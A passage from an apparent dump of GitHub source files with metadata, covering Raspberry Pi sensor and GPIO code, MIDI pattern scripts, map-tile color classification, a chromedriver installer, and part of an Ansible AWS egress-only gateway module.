bus.read_i2c_block_data(0x39, 0x8d, 1)\n data1_low = bus.read_i2c_block_data(0x39, 0x8e, 1)\n data1_high = bus.read_i2c_block_data(0x39, 0x8f, 1)\n data0 = data0_high[0] * 256 + data0_low[0]\n data1 = data1_high[0] * 256 + data1_low[0]\n if data0 == 0:\n light = 0\n else:\n div = float(data1) / float(data0)\n if 0 < div <= 0.5:\n light = (0.304 * data0 - 0.062 * data0 * (div ** 1.4))\n elif div <= 0.61:\n light = (0.0224 * data0 - 0.031 * data1)\n elif div <= 0.8:\n light = (0.0128 * data0 - 0.0153 * data1)\n elif div <= 1.3:\n light = (0.00146 * data0 - 0.00112 * data1)\n else:\n light = 0\n # print(f\"light:{light}\")\n # 更新光照寄存器的值\n slaver.set_values('Light', 187, int(light))\n\n # 读取空污模组的值\n # 空污传感器A脚接在BCM24上,B脚接在BCM23上\n # 空污传感器输出信号定义:\n # 污染等级 A信号输出 B信号输出 污染状态标识\n # 0 Low Low 优\n # 1 Low High 良\n # 2 High Low 中\n # 3 High High 差\n\n A = GPIO.input(24)\n B = GPIO.input(23)\n if A == 0 and B == 0:\n air = 0\n elif A == 0 and B == 1:\n air = 1\n elif A == 1 and B == 0:\n air = 2\n else:\n air = 3\n # print(air)\n # 更新空气质量传感器的值\n slaver.set_values('Air', 188, air)\n\n# m = max30102.MAX30102()\n# red, ir = m.read_sequential()\n# print(red,ir)\n\n # time.sleep(2)" }, { "alpha_fraction": 0.60546875, "alphanum_fraction": 0.61328125, "avg_line_length": 22.813953399658203, "blob_id": "763e43391de31896a36117bccb7fa96ae370e4af", "content_id": "dc527995785921f4dd6e624d771ca426fc437712", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1048, "license_type": "no_license", "max_line_length": 76, "num_lines": 43, "path": "/lx2k/ai.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import requests\nimport json\nimport base64\n\n# 别问,问就砍feature了没写完\n\napi = 'https://aip.baidubce.com/rpc/2.0/ai_custom/v1/video_cls/diedaojiance'\napp_id = ''\napi_key = ''\nsecret_key = ''\n\n\n# client_id为api key client_secret为secret key\ndef get_access_token(client_id, client_secret):\n url = 'https://aip.baidubce.com/oauth/2.0/token'\n data = {\n 'grant_type': 'client_credentials',\n 'client_id': api_key,\n 'client_secret': client_secret\n }\n res = requests.post(url=url, data=data)\n print(res.json()['refresh_token'])\n return res.json()['refresh_token']\n\n\ndef send_video(access_token, video):\n url = api\n headers = {\n 'Content-Type': 'application/json',\n 'access_token': access_token\n }\n data = {\n 'video': video,\n 'top_num': 6\n }\n res = requests.post(url=url, headers=headers, data=data)\n print(res.json())\n\n\nif __name__ == '__main__':\n video = ''\n access_token = get_access_token(api_key, secret_key)\n send_video(access_token, video)\n" }, { "alpha_fraction": 0.4808878004550934, "alphanum_fraction": 0.49568432569503784, "avg_line_length": 27.456140518188477, "blob_id": "e4c560286fbbe2afbfbd22ddba2052bd4b6127cd", "content_id": "36abf651ed171da4daf71ce762f385aff78d8f97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1622, "license_type": "no_license", "max_line_length": 61, "num_lines": 57, "path": "/lx2k/gpio.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import time\nimport os\n\n\ndef set_gpio(gpiox):\n gpio_dir = f'/sys/class/gpio/gpio{gpiox}'\n if os.path.isfile(f'{gpio_dir}/value'):\n with open(f'{gpio_dir}/direction') as state:\n if state.read(2) == 'in':\n is_state_out = False\n else:\n is_state_out = True\n if not is_state_out:\n with open(f'{gpio_dir}/direction', 'w') as state:\n state.write('out')\n with open(f'{gpio_dir}/value', 'w') as gpio:\n gpio.write('1')\n else:\n with open(f'/sys/class/gpio/export', 'w') as export:\n export.write(f'{gpiox}')\n set_gpio(gpiox)\n\n\ndef reset_gpio(gpiox):\n gpio_dir = f'/sys/class/gpio/gpio{gpiox}'\n if os.path.isfile(f'{gpio_dir}/value'):\n with open(f'{gpio_dir}/direction') as state:\n if state.read() == 'in':\n is_state_out = False\n else:\n is_state_out = True\n if not is_state_out:\n with open(f'{gpio_dir}/direction', 'w') as state:\n state.write('out')\n with open(f'{gpio_dir}/value', 'w') as gpio:\n gpio.write('0')\n else:\n with open(f'/sys/class/gpio/export', 'w') as export:\n export.write(f'{gpiox}')\n set_gpio(gpiox)\n\n\nif __name__ == '__main__':\n while True:\n set_gpio(60)\n time.sleep(2)\n set_gpio(61)\n time.sleep(2)\n set_gpio(62)\n time.sleep(2)\n set_gpio(63)\n time.sleep(2)\n reset_gpio(60)\n reset_gpio(61)\n reset_gpio(62)\n reset_gpio(63)\n time.sleep(5)\n" }, { "alpha_fraction": 0.7816901206970215, "alphanum_fraction": 0.8380281925201416, "avg_line_length": 14.666666984558105, "blob_id": "df730fbd519850c05a2f782bec9de3a380f97958", "content_id": "0008b1f98bd8305db0a7657c58e044fdba3cd021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 332, "license_type": "no_license", "max_line_length": 77, "num_lines": 9, "path": "/README.md", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "# 2021-emb\n\n本程序为2021年嵌入式竞赛龙芯赛道代码,旨在打造一个简易的本地的智能家居系统\n\n\n\n# 实现功能\n\nrpi读取传感器数据,通过modbus-tcp与龙芯派交流数据,龙芯派根据数据控制IO口进而控制继电器和用电器,以及给微信推送信息(使用server酱)。\n\n" } ]
6
Ureimu/small-tools
https://github.com/Ureimu/small-tools
7d4eb222685c9a14334eede98601c4851041c7b5
7d33946d327a10f072be6c255eaebde6fa77c688
8b48eda8517159f3506c5cb6171e07c166830719
refs/heads/master
2022-09-19T08:47:42.170751
2020-05-31T10:42:04
2020-05-31T10:42:04
268,242,973
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5670955777168274, "avg_line_length": 24.904762268066406, "blob_id": "88960ffb4237794e82f657a2b512430d56ee2be6", "content_id": "86d15590285401c6110bdf81965ff95fa671b8bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1220, "license_type": "no_license", "max_line_length": 71, "num_lines": 42, "path": "/get_csdn_code.py", "repo_name": "Ureimu/small-tools", "src_encoding": "UTF-8", "text": "import re\n\n\"\"\"\n将csdn的代码块的源代码输入,可以得到代码块的内容.\n事实上,基本所有的网站都可以用这个工具来提取代码.\n\"\"\"\nregex = r\"([0-9])|(>(.*?)<)\"\ntext=\"\"\ntest_str=input()\nmatches = re.finditer(regex, test_str, re.MULTILINE)\n\n#第一次匹配,去除html标签\nfor matchNum, match in enumerate(matches, start=1):\n for groupNum in range(0, len(match.groups())):\n groupNum = groupNum + 1\n if groupNum==3 and type(match.group(groupNum)) is str:\n text+=match.group(groupNum)\n try:\n if groupNum==1:\n int(match.group(groupNum))\n text+='\\n'\n except:\n pass\n\n#第二次匹配,转换一些html的保留字\ndef re_html_label(match_h):\n if match_h.group('left_angle_bracket')=='&lt;':\n return \"<\"\n elif match_h.group('right_angle_bracket')=='&gt;':\n return '>'\n elif match_h.group('and')=='&amp;':\n return '&'\n elif match_h.group('space')=='&nbsp;':\n return ' '\n else:\n pass\n \nregex2 = r\"(?P<left_angle_bracket>&lt;)|(?P<right_angle_bracket>&gt;)|\\\n (?P<and>&amp;)|(?P<space>&nbsp;)\"\ntext=re.sub(regex2,re_html_label,text)\n\nprint(text)\n" } ]
1
Anthonysokolov/midi-data
https://github.com/Anthonysokolov/midi-data
1258f129255bcd1e254c6a9882e1dae15c5fe321
889413b4dac6ec8f23026fb0562abf560cb8865d
b0312b5d6dfe655a5c68a0e8676c65405ff12c29
refs/heads/master
2022-12-11T02:05:33.517110
2020-09-03T00:47:39
2020-09-03T00:47:39
291,347,118
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5491480827331543, "alphanum_fraction": 0.5766710638999939, "avg_line_length": 17.609756469726562, "blob_id": "a0a41a2b1b91de408d524e50e9bdba826deee71b", "content_id": "75f22e1bd6eeabe485e0a97999b36387cbfb50f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 763, "license_type": "no_license", "max_line_length": 52, "num_lines": 41, "path": "/songs/song2.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "'''\nProgram to send midi data from python to a midi port\nMade to use with hardware synths!\n'''\n\nimport mido\nimport time\nimport sys\nfrom random import randint\n\nsys.path.append(\"..\")\n\nimport patterns as p\n\n# Connect port, change port name as needed\nport = \"minilogue SOUND\"\noutport = mido.open_output(port)\n\n\n\nfor loop in range(3):\n # generate messages\n #msg = mido.Message(\"note_on\",note=57 + 2*loop)\n size = 6\n messages = p.randAsc(size,start=57+loop,vel=3)\n\n for y in range(7,11):\n i = 0.01\n j = 0.001\n\n for x in range(y):\n msg = messages[x % size]\n outport.send(msg)\n time.sleep(i+j)\n\n temp = i\n i = i+j\n j = temp\n\n time.sleep(1/y)\n time.sleep(.35)\n" }, { "alpha_fraction": 0.5779816508293152, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 20.799999237060547, "blob_id": "5b9306892e069fd04eb78605bfdc97863f80baba", "content_id": "ec284895e965a9ab4c372edc94eade568e702693", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 545, "license_type": "no_license", "max_line_length": 66, "num_lines": 25, "path": "/intervals.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "import mido\n\ndef playAtIntervals(messages, times, outport):\n '''\n function to play messages at given intervals\n messages and times must be arrays of equal length\n '''\n for msg,t in zip(messages,times):\n outport.send(msg)\n time.sleep(t)\n\ndef getFibonacci(length, t1):\n '''\n returns array of intervals generated by the fibonacci sequence\n starts at t1\n '''\n out = []\n t2 = t1\n for i in range(length):\n out.append(t1)\n temp = t1\n t1 = t1 + t2\n t2 = temp\n\n return out\n" }, { "alpha_fraction": 0.6051948070526123, "alphanum_fraction": 0.63246750831604, "avg_line_length": 20.38888931274414, "blob_id": "b988c7ab3276eb0a8f93cb0246af2d8118f0f84e", "content_id": "5cd331ab1c43fe1760de37b335cf62e35b0d4e9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 770, "license_type": "no_license", "max_line_length": 52, "num_lines": 36, "path": "/songs/song1.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "'''\nProgram to send midi data from python to a midi port\nMade to use with hardware synths!\n'''\n\nimport mido\nimport time\nimport sys\nfrom random import randint\n\nsys.path.append(\"..\")\n\nimport patterns as p\n\n# Connect port, change port name as needed\nport = \"minilogue SOUND\"\noutport = mido.open_output(port)\n\nwhile True:\n # generate messages\n messages = p.ascending(5, start=67,step=3)\n messages.append(None)\n messages += p.ascending(5, start = 64, step=3)\n messages.append(None)\n messages += p.randWalk(7, start=71, vel=3)\n\n # send messages to output\n for msg in messages:\n if msg:\n outport.send(msg)\n amt = 0.05 * randint(4,8)\n time.sleep(amt)\n else:\n time.sleep(0.3)\n\n time.sleep(0.5)\n" }, { "alpha_fraction": 0.7844827771186829, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 57, "blob_id": "d3115ec86e4adb6571433579a8ee9c18568efb08", "content_id": "2d7712d0590a8c9fbd0dd421b721b83524c13f79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 91, "num_lines": 2, "path": "/scales.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "# todo implement scales\n3# map midi notes to c major scale and implement conversion from c major to any other scale\n" }, { "alpha_fraction": 0.800632894039154, "alphanum_fraction": 0.800632894039154, "avg_line_length": 30.600000381469727, "blob_id": "0c2852cfda4a34a2fd7e46fe7e5b14978581b367", "content_id": "8bf6bfa550658a2f58a43ed23251488eab3549f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 316, "license_type": "no_license", "max_line_length": 78, "num_lines": 10, "path": "/readme.md", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "# Sending Midi data to output ports with python!\nThis repo contains scripts designed to send midi signals from code to hardware\n\nDifferent modules are used to generate different kinds of patterns (still wip)\n\nOutput can be sent to any midi port connected to the machine\n\nSend a PR to contribute!\n\nDependencies: Mido\n" }, { "alpha_fraction": 0.5749769806861877, "alphanum_fraction": 0.6007359623908997, "avg_line_length": 26.871795654296875, "blob_id": "404189c2c3d01f7b04d2f5f67c9158a48eefe13d", "content_id": "5ade8c1a3a624a04f66c0423c8dd7a2a0d576788", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "no_license", "max_line_length": 78, "num_lines": 39, "path": "/patterns.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "import mido\nfrom random import randint\n\ndef ascending(num=7, start=0, step=1):\n return [mido.Message(\"note_on\", note = start + i*step)for i in range(num)]\n\ndef descending(num=7, start=127, step=1):\n return [mido.Message(\"note_on\", note = start - i*step)for i in range(num)]\n\ndef randAsc(num=7, start=0, vel=8):\n out = []\n current = start\n for i in range(num):\n out.append(mido.Message(\"note_on\", note = current))\n current = current + randint(0,vel)\n\n return out\n\ndef randDesc(num=7, start=127):\n out = []\n current = start\n for i in range(num):\n out.append(mido.Message(\"note_on\", note = current))\n current = current - randint(1,9)\n\n return out\n\ndef randWalk(num=7, start=64, lower=0, upper=127, vel=7):\n out = []\n current = start\n for i in range(num):\n out.append(mido.Message(\"note_on\", note = current))\n current = current + randint(-vel,vel)\n if current < lower:\n current = lower + randint(0,vel)\n if current > upper:\n current = upper - randint(0,vel)\n\n return out\n" }, { "alpha_fraction": 0.6015151739120483, "alphanum_fraction": 0.6348484754562378, "avg_line_length": 24.384614944458008, "blob_id": "f954db7a5550979e29f2187d42e85b8e5a24d62b", "content_id": "08db73db632e1e1fa09759e5959697e723e50a3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 660, "license_type": "no_license", "max_line_length": 58, "num_lines": 26, "path": "/main.py", "repo_name": "Anthonysokolov/midi-data", "src_encoding": "UTF-8", "text": "'''\nProgram to send midi data from python to a midi port\nMade to use with hardware synths!\n'''\n\nimport mido\nimport time\n\nimport patterns\n\n# Connect port, change port name as needed\nport = \"minilogue SOUND\"\noutport = mido.open_output(port)\n\nfor j in range(2):\n for i in range(2):\n # generate messages\n #messages = patterns.descending(5+i,127 - 4*i,4)\n #messages += patterns.ascending(3, 99-4*i, 4)\n messages = patterns.descending(start = 90, step=4)\n messages = patterns.randWalk(12,start = 72, vel=5)\n\n # send messages to output\n for msg in messages:\n outport.send(msg)\n time.sleep(.2)\n" } ]
7
agilebeat/pipeline-2
https://github.com/agilebeat/pipeline-2
3b806f7932fdc2e7adf325ff26024ba2b56e5a50
f5a786fd214e2ecf0e2ba66e5720b3d588513277
1fa6c117f8ed338fc1e8e10b957f949b7628a5de
refs/heads/master
2022-07-26T16:37:10.806659
2020-04-06T15:00:18
2020-04-06T15:00:18
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.601570188999176, "alphanum_fraction": 0.6231599450111389, "avg_line_length": 31.168420791625977, "blob_id": "55264b7579d8ba505ab21d6d131c76c7d2f6d708", "content_id": "beccdaaebdb12fad52526ac66e91c771b3464af0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3057, "license_type": "no_license", "max_line_length": 105, "num_lines": 95, "path": "/example-Color-based/COLOR_2_model.py", "repo_name": "agilebeat/pipeline-2", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 10:42:22 2020\n\n@author: swilson\n\"\"\"\nimport json\nimport boto3\nimport numpy as np\nimport base64\nimport io\nimport cv2\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport os\nimport collections\n\n\n\ndef dominant_color_set(rgb_list, n_most = 1, rgb_buffers=(5, 5, 5)):\n \"\"\"\n the functions return a list of dominant color (R,G,B) that charcterizes the map feature of interest\n < Arguments >\n * rgb_list: (r,b,g) list of n-most frequent colors (output of function \"hex_to_rgb()\")\n * n_most: the number of colors that would characterize the map feature of interest\n * rgb_buffers: R,G,B color buffer for color intervals considered featured color \n \"\"\"\n RGB_sets = [rgb for rgb, freq, prob in rgb_list[:n_most]]\n r_buffer, g_buffer, b_buffer = rgb_buffers \n\n feature_colors = []\n for rgb in RGB_sets:\n R, G, B = rgb\n R_max, G_max, B_max = (R + r_buffer, G + g_buffer, B + b_buffer)\n R_min, G_min, B_min = (R - r_buffer, G - g_buffer, B - b_buffer)\n colors = ((R_min, G_min, B_min), (R_max, G_max, B_max))\n feature_colors.append(colors) \n return feature_colors\n\n\ndef pic_val_count(img_name):\n \"\"\"\n the function counts colors (R,G,B) of input image, and returns with frequency\n < Arguments >\n * img_nam: image file name, e.g.) 'image.png'\n \"\"\"\n pic = cv2.imread(img_name)\n pic = cv2.cvtColor(pic, cv2.COLOR_BGR2RGB)\n\n reshaped_pic = np.reshape(pic, (pic.shape[0]*pic.shape[1], 3))\n reshaped_pic = reshaped_pic.tolist()\n reshaped_pic = [tuple(pixel) for pixel in reshaped_pic]\n \n col_count = []\n for i in set(reshaped_pic):\n (col_val, num_pic) = i, reshaped_pic.count(i)\n col_count.append((col_val, num_pic)) \n return col_count\n\n\n\ndef classify_feature_image(input_img, feature_colors, pix_cutoff=50):\n \"\"\"\n the function detects color of interest from input image\n < Arguments >\n * input_img: image file name, e.g.) 'image.png'\n * feature_colors: a list of featured color obtained from \"dominant_color_set()\"\n * pix_cutoff: the threshold number of featured pixel to be considered 'positive' image\n \"\"\"\n result = 'negative'\n for pic_val, num in pic_val_count(input_img):\n for min_rgb, max_rgb in feature_colors:\n if (((min_rgb[0] <= pic_val[0] <= max_rgb[0])\n &(min_rgb[1] <= pic_val[1] <= max_rgb[1])\n &(min_rgb[2] <= pic_val[2] <= max_rgb[2])) & (num > pix_cutoff)):\n result = \"positive\"\n return result\n\n\n\n\n###########################\n# Test\n########################### \ndir_pos = './landuse_construction/color_dist' \nHEXs_Freq = color_dist(dir_pos)\nrgb_list = hex_to_rgb\nfeature_colors = dominant_color_set(rgb_list)\n\n# positive\nclassify_feature_image('./landuse_construction/TEST/construction/19_432033_198647.png', feature_colors)\n# negative\nclassify_feature_image('./landuse_construction/TEST/not_construction/15_26878_12478.png', feature_colors)\n\n" }, { "alpha_fraction": 0.576076090335846, "alphanum_fraction": 0.5960960984230042, "avg_line_length": 32.25, "blob_id": "0135ff4b036d5a526ed74411f2c6a797f74c6325", "content_id": "ebe8e3320cb05e02f12ad0fa0927a78dddd5d742", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1998, "license_type": "no_license", "max_line_length": 101, "num_lines": 60, "path": "/example-Color-based/COLOR_1_dominant_colors.py", "repo_name": "agilebeat/pipeline-2", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 10:30:26 2020\n\n@author: swilson\n\"\"\"\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\nimport collections\n\n\ndef color_dist(dir_pos, descending=True):\n \"\"\"\n the function returns list of tuples (hex_code, freq) in descending (default) order of frequency \n < Arguments > \n * dir_pos: path of directory where postivie images are \n \"\"\"\n tiles = [os.path.join((dir_pos), file) for file in os.listdir(dir_pos)]\n \n color_vals = [] \n for img in tiles:\n pic = cv2.imread(img)\n pic = cv2.cvtColor(pic, cv2.COLOR_BGR2RGB)\n \n reshaped_pic = np.reshape(pic, (pic.shape[0]*pic.shape[1], 3))\n reshaped_pic = reshaped_pic.tolist()\n \n RGBs = [(pixel[0], pixel[1], pixel[2]) for pixel in reshaped_pic]\n HEXs = ['%02x%02x%02x' % rgb for rgb in RGBs]\n color_vals = color_vals + list(set(HEXs))\n \n total_n_images = len(tiles)\n Freq = collections.Counter(color_vals)\n Freq = {k: v for k, v in sorted(Freq.items(), \n reverse=descending, key=lambda item: item[1])}\n HEXs_Freq = list(Freq.items()) \n HEXs_Freq = [(hex_code, freq, round(freq/total_n_images, 3) ) \n for hex_code, freq in HEXs_Freq]\n return HEXs_Freq \n\n\ndef hex_to_rgb(HEXs_Freq, n_most_rgb=10):\n \"\"\"\n the function converts HEXs to RGB code for n-most frequent color used in positive data\n < Arguments >\n * HEXs_Freq: the list of HEXs color codes collected from the positive data\n * n_most_rgb: limites output. Returns n colors only (descending order)\n \"\"\"\n rgb_list = [] \n for hex_code, freq, pct in HEXs_Freq[:n_most_rgb]:\n value = hex_code.lstrip('#')\n lv = len(value)\n rgb = tuple(int(value[i:i+lv//3], 16) for i in range(0, lv, lv//3))\n rgb_list = rgb_list + [(rgb, freq, pct)]\n return rgb_list " } ]
2
xuanhien091/python-chromedriver-binary
https://github.com/xuanhien091/python-chromedriver-binary
aa62788dc253836fbf551d6ccce03779b9cb5397
8deab624b3c712b3d8fd21f4d3a925b4b024c3de
b32d599b00fb733f5a328aafb97dbc1f6b82e2c2
refs/heads/master
2023-06-02T09:15:02.159060
2021-06-12T04:03:57
2021-06-12T04:03:57
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6384401321411133, "alphanum_fraction": 0.6462395787239075, "avg_line_length": 41.235294342041016, "blob_id": "d875f6f7b712f2b899cc9b5800d431a54ab102a8", "content_id": "64dbe9bbfafd30df44585ebfdc526f874c9f592a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3590, "license_type": "permissive", "max_line_length": 123, "num_lines": 85, "path": "/setup.py", "repo_name": "xuanhien091/python-chromedriver-binary", "src_encoding": "UTF-8", "text": "from setuptools import setup\nfrom setuptools.command.build_py import build_py\nfrom chromedriver_binary.utils import get_chromedriver_filename, get_chromedriver_url, find_binary_in_path, check_version\n\nimport os\nimport zipfile\n\ntry:\n from io import BytesIO\n from urllib.request import urlopen, URLError\nexcept ImportError:\n from StringIO import StringIO as BytesIO\n from urllib2 import urlopen, URLError\n\n__author__ = 'Daniel Kaiser <[email protected]>'\n\n\nwith open('README.md') as readme_file:\n long_description = readme_file.read()\n\n\nclass DownloadChromedriver(build_py):\n def run(self):\n \"\"\"\n Downloads, unzips and installs chromedriver.\n If a chromedriver binary is found in PATH it will be copied, otherwise downloaded.\n \"\"\"\n chromedriver_version='92.0.4515.43'\n chromedriver_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'chromedriver_binary')\n chromedriver_filename = find_binary_in_path(get_chromedriver_filename())\n if chromedriver_filename and check_version(chromedriver_filename, chromedriver_version):\n print(\"\\nChromedriver already installed at {}...\\n\".format(chromedriver_filename))\n new_filename = os.path.join(chromedriver_dir, get_chromedriver_filename())\n self.copy_file(chromedriver_filename, new_filename)\n else:\n chromedriver_bin = get_chromedriver_filename()\n chromedriver_filename = os.path.join(chromedriver_dir, chromedriver_bin)\n if not os.path.isfile(chromedriver_filename) or not check_version(chromedriver_filename, chromedriver_version):\n print(\"\\nDownloading Chromedriver...\\n\")\n if not os.path.isdir(chromedriver_dir):\n os.mkdir(chromedriver_dir)\n url = get_chromedriver_url(version=chromedriver_version)\n try:\n response = urlopen(url)\n if response.getcode() != 200:\n raise URLError('Not Found')\n except URLError:\n raise RuntimeError('Failed to download chromedriver archive: {}'.format(url))\n archive = BytesIO(response.read())\n with zipfile.ZipFile(archive) as zip_file:\n zip_file.extract(chromedriver_bin, chromedriver_dir)\n else:\n print(\"\\nChromedriver already installed at {}...\\n\".format(chromedriver_filename))\n if not os.access(chromedriver_filename, os.X_OK):\n os.chmod(chromedriver_filename, 0o744)\n build_py.run(self)\n\n\nsetup(\n name=\"chromedriver-binary\",\n version=\"92.0.4515.43.0\",\n author=\"Daniel Kaiser\",\n author_email=\"[email protected]\",\n description=\"Installer for chromedriver.\",\n license=\"MIT\",\n keywords=\"chromedriver chrome browser selenium splinter\",\n url=\"https://github.com/danielkaiser/python-chromedriver-binary\",\n packages=['chromedriver_binary'],\n package_data={\n 'chromedriver_binary': ['chromedriver*']\n },\n entry_points={\n 'console_scripts': ['chromedriver-path=chromedriver_binary.utils:print_chromedriver_path'],\n },\n long_description_content_type='text/markdown',\n long_description=long_description,\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Topic :: Software Development :: Testing\",\n \"Topic :: System :: Installation/Setup\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: MIT License\",\n ],\n cmdclass={'build_py': DownloadChromedriver}\n)\n" }, { "alpha_fraction": 0.7711682915687561, "alphanum_fraction": 0.7759914398193359, "avg_line_length": 32.32143020629883, "blob_id": "b69903d451fdddacf2f41ed3c57921cccf55f409", "content_id": "429cc6027dcf7b04a5fa1597356de27df7873f74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1866, "license_type": "permissive", "max_line_length": 225, "num_lines": 56, "path": "/README.md", "repo_name": "xuanhien091/python-chromedriver-binary", "src_encoding": "UTF-8", "text": "# chromedriver-binary\nDownloads and installs the [chromedriver](https://sites.google.com/a/chromium.org/chromedriver/) binary version 92.0.4515.43 for automated testing of webapps. The installer supports Linux, MacOS and Windows operating systems.\n\nAlternatively the package [chromedriver-binary-auto](https://pypi.org/project/chromedriver-binary-auto/) can be used to automatically detect the latest chromedriver version required for the installed Chrome/Chromium browser.\n\n## Installation\n\n### Latest and fixed versions\n\n#### From PyPI\n```\npip install chromedriver-binary\n```\n\n#### From GitHub\n```\npip install git+https://github.com/danielkaiser/python-chromedriver-binary.git\n```\n\n### Automatically detected versions\n\nPlease make sure to install Chrome or Chromium first and add the browser to the binary search path.\n\n#### From PyPI\n```\npip install chromedriver-binary-auto\n```\n\nTo redetect the required version and install the newest suitable chromedriver after the first installation simply reinstall the package using\n```\npip install --upgrade --force-reinstall chromedriver-binary-auto\n```\n\n#### From GitHub\n```\npip install git+https://github.com/danielkaiser/python-chromedriver-binary.git@chromedriver-binary-auto\n```\n\n## Usage\nTo use chromedriver just `import chromedriver_binary`. This will add the executable to your PATH so it will be found. You can also get the absolute filename of the binary with `chromedriver_binary.chromedriver_filename`.\n\n### Example\n```\nfrom selenium import webdriver\nimport chromedriver_binary # Adds chromedriver binary to path\n\ndriver = webdriver.Chrome()\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\n```\n\n### Exporting chromedriver binary path\nThis package installs a small shell script `chromedriver-path` to easily set and export the PATH variable:\n```\n$ export PATH=$PATH:`chromedriver-path`\n```\n" } ]
2
shepdelacreme/ansible-custom-modules
https://github.com/shepdelacreme/ansible-custom-modules
cb813c748584d2363f67ad3742271cb8177acbaf
6d3f5e521f59cbbd8967aa455d8b53bec03dfa35
6bfff10f2158a4da28acc403e684b4ab08324caa
refs/heads/master
2021-01-20T04:02:03.818304
2017-05-31T13:53:43
2017-05-31T13:53:43
89,624,403
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.656095564365387, "alphanum_fraction": 0.6628226041793823, "avg_line_length": 33.037384033203125, "blob_id": "b0dfbbc24f92cb609bbe3a63547858db5b67cadf", "content_id": "38fec0bf4b75603f36975b68cf960a3cd0cf6119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7284, "license_type": "no_license", "max_line_length": 151, "num_lines": 214, "path": "/library/ec2_vpc_eigw.py", "repo_name": "shepdelacreme/ansible-custom-modules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# This is a free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This Ansible library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this library. If not, see <http://www.gnu.org/licenses/>.\n\nANSIBLE_METADATA = {'metadata_version': '1.0',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: ec2_vpc_eigw\nshort_description: Manage an AWS VPC Egress Only Internet gateway\ndescription:\n - Manage an AWS VPC Egress Only Internet gateway\nversion_added: \"2.4\"\nauthor: Daniel Shepherd (@shepdelacreme)\noptions:\n vpc_id:\n description:\n - The VPC ID for the VPC that this Egress Only Internet Gateway should be attached.\n required: true\n state:\n description:\n - Create or delete the EIGW\n default: present\n choices: [ 'present', 'absent' ]\nextends_documentation_fragment:\n - aws\n - ec2\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n# Ensure that the VPC has an Internet Gateway.\n# The Internet Gateway ID is can be accessed via {{eigw.gateway_id}} for use in setting up NATs etc.\nec2_vpc_eigw:\n vpc_id: vpc-abcdefgh\n state: present\nregister: eigw\n\n'''\n\nRETURN = '''\ngateway_id:\n description: The ID of the Egress Only Internet Gateway\n returned: success\n type: string\n sample: eigw-0e00cf111ba5bc11e\n'''\n\n\nimport traceback\nfrom time import sleep\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ec2 import (\n boto3_conn,\n ec2_argument_spec,\n get_aws_connection_info,\n AWSRetry,\n HAS_BOTO3,\n boto3_tag_list_to_ansible_dict,\n camel_dict_to_snake_dict,\n ansible_dict_to_boto3_filter_list\n)\nfrom botocore.exceptions import ClientError\n\n\[email protected]()\ndef delete_eigw(module, client, eigw_id):\n 